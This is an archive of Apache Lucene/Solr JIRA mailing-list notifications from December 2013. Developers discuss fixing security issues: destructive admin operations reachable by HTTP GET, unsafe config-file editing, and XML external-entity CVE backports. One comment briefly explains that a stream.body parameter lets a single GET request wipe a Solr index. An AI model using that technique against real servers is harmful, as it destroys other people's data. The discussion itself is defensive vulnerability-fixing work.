[jira] [Comment Edited] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836519#comment-13836519
 ] 

Uwe Schindler edited comment on SOLR-1523 at 12/2/13 2:13 PM:
--

This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml  parameter 
enableRemoteStreaming="true" which should pershaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming, a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday: [SOLR-5287 
PoC|https://issues.apache.org/jira/browse/SOLR-5287?focusedCommentId=13836061&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-13836061]


was (Author: thetaphi):
This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml  parameter 
enableRemoteStreaming="true" which should pershaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming, a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday: 
[https://issues.apache.org/jira/browse/SOLR-5287?focusedCommentId=13836061&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-13836061]

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Resolved] (LUCENE-2176) Pass Lucli the index to use as a command line argument

2013-12-02 Thread JIRA


 [ 
https://issues.apache.org/jira/browse/LUCENE-2176?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jan Høydahl resolved LUCENE-2176.
-

Resolution: Won't Fix

I'm pretty sure that Lucli is not part of Lucene any more, could not find it 
anywhere - closing!

> Pass Lucli the index to use as a command line argument
> --
>
> Key: LUCENE-2176
> URL: https://issues.apache.org/jira/browse/LUCENE-2176
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/other
>Reporter: Carlo Cabanilla
>Priority: Minor
> Attachments: lucli_index_as_arg.patch
>
>
> I made a patch to let you tell Lucli which index to use by passing it in as a 
> command line argument. I made the change off of the 3.0 branch, wasn't sure 
> where the best place to do it was.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Resolved] (SOLR-412) XsltWriter does not output UTF-8 by default

2013-12-02 Thread JIRA


 [ 
https://issues.apache.org/jira/browse/SOLR-412?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jan Høydahl resolved SOLR-412.
--

Resolution: Duplicate

I believe this is fixed in 3.1 by SOLR-2391. Have looked in code but not 
verified by testing. Please re-open if anyone still thinks there is work left 
on this.

> XsltWriter does not output UTF-8 by default
> ---
>
> Key: SOLR-412
> URL: https://issues.apache.org/jira/browse/SOLR-412
> Project: Solr
>  Issue Type: Bug
>  Components: Response Writers
>Affects Versions: 1.2
> Environment: Tomcat 5.5
> Linux Red Hat ES4  (2.6.9-5.ELsmp from 'uname -a')
>Reporter: Lance Norskog
> Attachments: diff-2009-10-22
>
>
> XsltWriter outputs XML text in ISO-8859-1 encoding by default.
> Tomcat 5.5 has URIEncoding="UTF-8" set in the  element as 
> described in the Wiki.
> This outout description in the XML: 
> 
> gives output with this header:
> HTTP/1.1 200 OK
> Server: Apache-Coyote/1.1
> Content-Type: text/xml;charset=ISO-8859-1
> Transfer-Encoding: chunked
> Date: Wed, 14 Nov 2007 17:49:11 GMT
> I had to change the  directive to this:
>  
> This is the root cause of SOLR-233.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836521#comment-13836521
 ] 

Uwe Schindler commented on SOLR-5518:
-

Please do (2) as suggested in the other issue.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 is a 
> security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836519#comment-13836519
 ] 

Uwe Schindler commented on SOLR-1523:
-

This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml  parameter 
enableRemoteStreaming="true" which should pershaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming, a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday.

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Erick Erickson (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836517#comment-13836517
 ] 

Erick Erickson commented on SOLR-5518:
--

I need a plan Real Soon Now. Like in the next 8 hours.

I see several options:
1> go ahead and check this in to both trunk and 4x. 
2> just check it in to trunk and remove the whole thing from 4x entirely. 
Perhaps this will be a 5x only feature?
3> take it out of both.
4> other suggestions?

NOTE: if a subsequent decision is to pull things out, this will be quite simple 
on the server side, just remove the (new) EditFileRequestHandler class and then 
get tests to run. There'll be a test class that just gets removed, and there'll 
be a bit of code to remove in an existing test (ZK, TestModifyConfFiles). I 
think I put all the static methods in ShowFileRequestHandler, so that should be 
coherent. Finally, there'll be several solrconfig files to pull the comments 
out of. But a grep for EditFileRequestHandler should suffice to find them all.

[~steffkes] If we remove this either from 4x or trunk or both, how much work 
will it be to remove the "files" stuff in the UI? Would it be sufficient to 
just comment out the code at the top level that shows the files option?

I think it'll be far easier to just jerk the code out than roll back the 
commits, any objections to doing <2> or <3> that way?

In the absence of any consensus, I'll do <2> this evening. I'll probably 
actually merge this code into 4x, _then_ remove it on a subsequent ticket, so 
don't be surprised if you see this get checked in to the 4x branch temporarily.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 is a 
> security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread JIRA


[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836512#comment-13836512
 ] 

Jan Høydahl commented on SOLR-1523:
---

Agree. But this issue feels a bit too broad talking about request handlers in 
general. Our admin API technology of choice seems to be Restlet.

Perhaps create new concrete sub JIRAs, one for new Core admin REST API, one for 
Collections REST API and one for enableRemoteStreaming. Are there other admin 
APIs to consider?

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Noble Paul (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836506#comment-13836506
 ] 

Noble Paul commented on SOLR-1523:
--

I still believe we should just  fix this. It is very easy to screw up stuff 
over http GET

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread JIRA


 [ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jan Høydahl updated SOLR-1523:
--

Labels: security  (was: )

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread JIRA


[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836500#comment-13836500
 ] 

Jan Høydahl commented on SOLR-1523:
---

I'm tempted to close this as Won't fix, as it seems people are in general happy 
with the APIs.

However, since we got the new Schema REST API we actually started doing admin 
stuff with proper REST. I like that. Question is whether there is anything to 
gain by re-writing the Cores API and the Collections API to use RestLet as 
well, getting away with the {{action=CREATE}} kind of syntax and instead doing 
it with POST/PUT. Perhaps for 5.0?

Another dangerous default is the solrconfig.xml {{}} parameter 
{{enableRemoteStreaming="true"}} which should pershaps default to {{false}} 
from 4.7 or 5.0. It allows anyone to delete everything with a single GET...

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Resolved] (SOLR-5520) Backport some security fixes from 4.x to 3.6.x branch

2013-12-02 Thread Uwe Schindler (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5520?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler resolved SOLR-5520.
-

Resolution: Fixed

> Backport some security fixes from 4.x to 3.6.x branch
> -
>
> Key: SOLR-5520
> URL: https://issues.apache.org/jira/browse/SOLR-5520
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 3.6.2
>Reporter: Uwe Schindler
>Assignee: Uwe Schindler
> Fix For: 3.6.3
>
> Attachments: SOLR-4481-3895-36.patch, SOLR-4882-36.patch
>
>
> Redhat wants to backport some security fixes we applied in 4.1 and 4.6 to the 
> Solr tree to 3.6, because their user-base still uses this version. To help 
> them with backporting across the major API/version changes, we should also do 
> this on the 3.6 branch.
> Redhat already assigned 3 CVE numbers to these issues and take the older 
> issues seriously, and they will patch older versions and also force users to 
> upgrade. cf, 
> [CVE-2013-6397|https://access.redhat.com/security/cve/CVE-2013-6397] 
> (SOLR-4882), 
> [CVE-2013-6407|https://access.redhat.com/security/cve/CVE-2013-6407] 
> (SOLR-3895), 
> [CVE-2013-6408|https://access.redhat.com/security/cve/CVE-2013-6408] 
> (SOLR-4881).
> To fully fix, we might need to backport more patches. I will take care of 
> this. This issue may be useful, if we release a 3.6.3 package.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (LUCENE-2395) Add a scoring DistanceQuery that does not need caches and separate filters

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/LUCENE-2395?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836499#comment-13836499
 ] 

Uwe Schindler commented on LUCENE-2395:
---

Currently the expressions module does not yet allow to modify the score of a 
query. This is on my todo list. I discussed that with Shai remotely and Robert 
personally the last time I was at his house :-)

But yes, this would be cool!

> Add a scoring DistanceQuery that does not need caches and separate filters
> --
>
> Key: LUCENE-2395
> URL: https://issues.apache.org/jira/browse/LUCENE-2395
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/spatial
>Reporter: Uwe Schindler
> Attachments: ASF.LICENSE.NOT.GRANTED--DistanceQuery.java, 
> ASF.LICENSE.NOT.GRANTED--DistanceQuery.java
>
>
> In a chat with Chris Male and my own ideas when implementing for PANGAEA, I 
> thought about the broken distance query in contrib. It lacks the following 
> features:
> - It needs a query/filter for the enclosing bbox (which is constant score)
> - It needs a separate filter for filtering out hits to far away (inside bbox 
> but outside distance limit)
> - It has no scoring, so if somebody wants to sort by distance, he needs to 
> use the custom sort. For that to work, spatial caches distance calculation 
> (which is broken for multi-segment search)
> The idea is now to combine all three things into one query, but customizeable:
> We first thought about extending CustomScoreQuery and calculate the distance 
> from FieldCache in the customScore method and return a score of 1 for 
> distance=0, score=0 on the max distance and score<0 for farer hits, that are 
> in the bounding box but not in the distance circle. To filter out such 
> negative scores, we would need to override the scorer in CustomScoreQuery 
> which is priate.
> My proposal is now to use a very stripped down CustomScoreQuery (but not 
> extend it) that does call a method getDistance(docId) in its scorer's advance 
> and nextDoc that calculates the distance for the current doc. It stores this 
> distance also in the scorer. If the distance > maxDistance it throws away the 
> hit and calls nextDoc() again. The score() method will reurn per default 
> weight.value*(maxDistance - distance)/maxDistance and uses the precalculated 
> distance. So the distance is only calculated one time in nextDoc()/advance().
> To be able to plug in custom scoring, the following methods in the query can 
> be overridden:
> - float getDistanceScore(double distance) - returns per default: (maxDistance 
> - distance)/maxDistance; allows score customization
> - DocIdSet getBoundingBoxDocIdSet(Reader, LatLng sw, LatLng ne) - returns an 
> DocIdSet for the bounding box. Per default it returns e.g. the docIdSet of a 
> NRF or a cartesian tier filter. You can even plug in any other DocIdSet, e.g. 
> wrap a Query with QueryWrapperFilter
> - support a setter for the GeoDistanceCalculator that is used by the scorer 
> to get the distance.
> - a LatLng provider (similar to CustomScoreProvider/ValueSource) that returns 
> for a given doc id the lat/lng. This method is called per IndexReader one 
> time in scorer creation and will retrieve the coordinates. By that we support 
> FieldCache or whatever.
> This query is almost finished in my head, it just needs coding :-)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-3614) XML parsing in XPathEntityProcessor doesn't respect ENTITY declarations?

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-3614?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836491#comment-13836491
 ] 

ASF subversion and git services commented on SOLR-3614:
---

Commit 1547011 from [~thetaphi] in branch 'dev/branches/lucene_solr_3_6'
[ https://svn.apache.org/r1547011 ]

SOLR-5520: Backports of:
- SOLR-4881 (Fix DocumentAnalysisRequestHandler to correctly use 
EmptyEntityResolver to prevent loading of external entities like 
UpdateRequestHandler does)
- SOLR-3895 (XML and XSLT UpdateRequestHandler should not try to resolve 
external entities)
- SOLR-3614 (Fix XML parsing in XPathEntityProcessor to correctly expand named 
entities, but ignore external entities)

> XML parsing in XPathEntityProcessor doesn't respect ENTITY declarations?
> 
>
> Key: SOLR-3614
> URL: https://issues.apache.org/jira/browse/SOLR-3614
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 3.6, 4.0-BETA
>Reporter: Hoss Man
>Assignee: Uwe Schindler
> Fix For: 4.1, 5.0
>
> Attachments: SOLR-3614.patch
>
>
> As reported by Michael Belenki on solr-user, pointing XPathEntityProcessor at 
> XML files that use DTD "ENTITY" declarations causes XML parse errors of the 
> form...
> {noformat}
> org.apache.solr.handler.dataimport.DataImportHandlerException: Parsing failed 
> for xml, url:testdata.xml rows processed:0
> ...
> Caused by: java.lang.RuntimeException: com.ctc.wstx.exc.WstxParsingException: 
> Undeclared general entity "uuml"
> ...
> {noformat}
> ...even when the entity is specifically declared.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-5478) Speed-up distributed search with high rows param or deep paging by transforming docId's to uniqueKey via memory docValues

2013-12-02 Thread Manuel Lenormand (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Manuel Lenormand updated SOLR-5478:
---

Attachment: SOLR-5478.patch

repatched it, waiting for comments

> Speed-up distributed search with high rows param or deep paging by 
> transforming docId's to uniqueKey via memory docValues
> -
>
> Key: SOLR-5478
> URL: https://issues.apache.org/jira/browse/SOLR-5478
> Project: Solr
>  Issue Type: Improvement
>  Components: Response Writers
>Affects Versions: 4.5
>Reporter: Manuel Lenormand
> Fix For: 4.6
>
> Attachments: SOLR-5478.patch
>
>




--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-3895) For several reasons, disabling the resolving of external entities within the Solr UpdateRequestHandler for XML would be good.

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-3895?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836490#comment-13836490
 ] 

ASF subversion and git services commented on SOLR-3895:
---

Commit 1547011 from [~thetaphi] in branch 'dev/branches/lucene_solr_3_6'
[ https://svn.apache.org/r1547011 ]

SOLR-5520: Backports of:
- SOLR-4881 (Fix DocumentAnalysisRequestHandler to correctly use 
EmptyEntityResolver to prevent loading of external entities like 
UpdateRequestHandler does)
- SOLR-3895 (XML and XSLT UpdateRequestHandler should not try to resolve 
external entities)
- SOLR-3614 (Fix XML parsing in XPathEntityProcessor to correctly expand named 
entities, but ignore external entities)

> For several reasons, disabling the resolving of external entities within the 
> Solr UpdateRequestHandler for XML would be good.
> -
>
> Key: SOLR-3895
> URL: https://issues.apache.org/jira/browse/SOLR-3895
> Project: Solr
>  Issue Type: Improvement
>  Components: update
>Affects Versions: 3.6.1, 4.0-BETA
>Reporter: Martin Herfurt
>Assignee: Uwe Schindler
>Priority: Minor
> Fix For: 4.1, 5.0
>
> Attachments: SOLR-3895+3614.patch, SOLR-3895+3614.patch, 
> SOLR-3895.patch, SOLR-3895.patch, SOLR-3895.patch, SOLR-3895.patch
>
>
> The Solr UpdateRequestHandler for XML currently resolves so-called XML 
> External Entities. Not resolving XML External Entities would - among other 
> things - improve Solr's update performance.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-5478) Speed-up distributed search with high rows param or deep paging by transforming docId's to uniqueKey via memory docValues

2013-12-02 Thread Manuel Lenormand (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Manuel Lenormand updated SOLR-5478:
---

Attachment: (was: DocValuesBinaryResponseWriter.java)

> Speed-up distributed search with high rows param or deep paging by 
> transforming docId's to uniqueKey via memory docValues
> -
>
> Key: SOLR-5478
> URL: https://issues.apache.org/jira/browse/SOLR-5478
> Project: Solr
>  Issue Type: Improvement
>  Components: Response Writers
>Affects Versions: 4.5
>Reporter: Manuel Lenormand
> Fix For: 4.6
>
>




--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

1 2 >

1 - 100 of 123 matches

Mail list logo